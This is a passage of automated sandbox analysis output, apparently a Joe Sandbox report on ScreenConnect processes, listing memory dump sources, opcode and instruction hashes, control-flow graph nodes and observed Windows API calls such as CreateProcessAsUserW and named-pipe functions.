                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF09E730082500BC311D62CFC42FDA3FE9DFD2261B0809EAE041CB225DE5CEA09C360
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: baaa9b54e661cf7376cb5c5bdb1cc7612a893397eeac01f451ad003ac92c1b46
                                                                                                                                                                                                                                                        • Instruction ID: a92fcba43a781d63a166ef07218cf3a70d275585ba8e40b2df780d554d0330be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa9b54e661cf7376cb5c5bdb1cc7612a893397eeac01f451ad003ac92c1b46
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F0EC72804158AFCB10DFACDC92BAD7BA9DB40210B2045A9E048D3240EE398F0ADB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 823c4e668c603ce3cc2b7be1fad728c8a60c12e1838dd1fba97968e8e1b93811
                                                                                                                                                                                                                                                        • Instruction ID: 60f12684528353c4da2c91bb6909236fe065a3a309c9c16f74e22aab463022ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823c4e668c603ce3cc2b7be1fad728c8a60c12e1838dd1fba97968e8e1b93811
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E0E672D051085F8B80DFBCCD55259BBF5EB48204F5449A9D41DE7301F632A6168B91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a9359159e7b58a0227aaa9bb97d448d085bc1794b46c05386ad5bd5d4c7273b2
                                                                                                                                                                                                                                                        • Instruction ID: 93c33913442714d291c730daa3bb2158cc73f52067e6f88e45a5bd9cb2842a66
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9359159e7b58a0227aaa9bb97d448d085bc1794b46c05386ad5bd5d4c7273b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EE04635A59300AFD340AF24E946785BFE0AB49604F08882CF88CC3241E638AD858B82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 385408e8203ecc633cc135f0cd6818b462ff9c285199b1f63652be66e17e3478
                                                                                                                                                                                                                                                        • Instruction ID: 5596613cbb8a32a454c3b94ee2dda952d4d64e99b3094a49216c35f2734447d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 385408e8203ecc633cc135f0cd6818b462ff9c285199b1f63652be66e17e3478
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E08C31404211AFD380EF28EA89385BBF0FF04204F054C2CE8CDD3200E338E94A8B82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 21e5efa5c589ddfddddfebc6df7b0e3e3d6d52b66cfa70cdeecb709c7befba8c
                                                                                                                                                                                                                                                        • Instruction ID: 95e76c5e36f12f75fee032d8187f11c0e10a909cbd38cd117a84ae182551919e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21e5efa5c589ddfddddfebc6df7b0e3e3d6d52b66cfa70cdeecb709c7befba8c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30D01730E4120CEF8B04EFACEA0595EBBB9EB44214B1045A8E408D3240EE356F089B90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6eba4eb95c1436c3c3f7d9dc43e60f03d7a5e1491ad76bbf132c49e46029f9a
                                                                                                                                                                                                                                                        • Instruction ID: ff41de0d1e62b409080f2b07ad5404781d9843c03fda43400b68eeb2bb3d4a4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6eba4eb95c1436c3c3f7d9dc43e60f03d7a5e1491ad76bbf132c49e46029f9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01D0127190110CEF8B40DFB4EA4555DBBB9DB48324B1041A9D40CD3200DA315F049B40

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:14.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:88.6%
                                                                                                                                                                                                                                                        Signature Coverage:2.9%
                                                                                                                                                                                                                                                        Total number of Nodes:105
                                                                                                                                                                                                                                                        Total number of Limit Nodes:7

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05362A9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                                                                                                                                        • Opcode ID: 3d698bc6e3a050c17aaf98be8b0f7d5f0fc1358b6190c0ab09b7bb993dd1a3b6
                                                                                                                                                                                                                                                        • Instruction ID: a8c211fb6e1939bef80ccb409d480197399deebf19411154f081d056c9f244c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d698bc6e3a050c17aaf98be8b0f7d5f0fc1358b6190c0ab09b7bb993dd1a3b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041137A900209DFCF11CFA9C884ADEBBF6FF48310F15852AE918A7250D775A955CF90

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05364D75
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID: 4L]q
                                                                                                                                                                                                                                                        • API String ID: 823142352-261793533

Control-flow Graph (graph image not preserved)
APIs
• CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05364D75
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
Similarity
• API ID: CreateFile
• String ID: 4L]q
• API String ID: 823142352-261793533

Control-flow Graph (graph image not preserved)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: $]q$$]q
• API String ID: 0-127220927

Control-flow Graph (graph image not preserved)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (&]q$(aq
• API String ID: 0-1602648543

Control-flow Graph (graph image not preserved)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: `pq$nCuq
• API String ID: 0-3819717929

Control-flow Graph (graph image not preserved)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: `Q]q$`Q]q
• API String ID: 0-3952371890

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 618 dd5410-dd541b 620 dd5421-dd5423 618->620 621 dd543b-dd543c 620->621 622 dd5425-dd542b 620->622 623 dd542d 622->623 624 dd542f-dd5431 622->624 623->621 624->621
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q$$]q
                                                                                                                                                                                                                                                        • API String ID: 0-127220927

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 625 5353568-535357d 626 5353592-5353599 625->626 627 535357f-5353582 625->627 630 535359e-53535e2 call 5352814 626->630 628 535364c-5353660 627->628 629 5353588-5353591 627->629 631 5353626-535362f 628->631 632 5353662 628->632 650 53535e7-53535ec 630->650 634 5353631-535364b 631->634 635 535368c-53536a0 631->635 633 535366e-5353677 632->633 639 53536a2-53536ec 635->639 640 53536ed-53536ee 635->640 639->640 642 53536f0-53536f8 640->642 643 53536fa-5353730 K32EnumProcesses 640->643 642->643 644 5353732-5353738 643->644 645 5353739-5353761 643->645 644->645 651 53535f2-53535f5 650->651 652 5353678-5353685 650->652 653 5353664-5353669 651->653 654 53535f7-5353624 651->654 652->635 653->630 654->631 654->633
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 659 53629c9-5362a21 661 5362a23-5362a29 659->661 662 5362a2c-5362a30 659->662 661->662 663 5362a32-5362a35 662->663 664 5362a38-5362a4d 662->664 663->664 665 5362a4f-5362a58 664->665 666 5362a5b-5362ab2 CreateProcessAsUserW 664->666 665->666 667 5362ab4-5362aba 666->667 668 5362abb-5362ae3 666->668 667->668
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05362A9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 053537FE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProcessSession
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3779259828-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05360D78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05360D78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0535371D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnumProcesses
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 84517404-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05364146), ref: 053641EF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05364146), ref: 053641EF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 053537FE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProcessSession
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3779259828-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq
                                                                                                                                                                                                                                                        • API String ID: 0-4247494828
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq
                                                                                                                                                                                                                                                        • API String ID: 0-4247494828
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q
                                                                                                                                                                                                                                                        • API String ID: 0-1007455737
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q
                                                                                                                                                                                                                                                        • API String ID: 0-1007455737
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cb7483af813313980fa059aa402944fc15df71a5c36635f0899d4683ecd4a9b0
                                                                                                                                                                                                                                                        • Instruction ID: 8ede05f97edf37944321d35a19968a7a5007048ee019227ea5350df8a84616d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb7483af813313980fa059aa402944fc15df71a5c36635f0899d4683ecd4a9b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24514E34B003058FCB14EF78D99496AB7E6EF983147148569E546CF365DB70EC068B91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
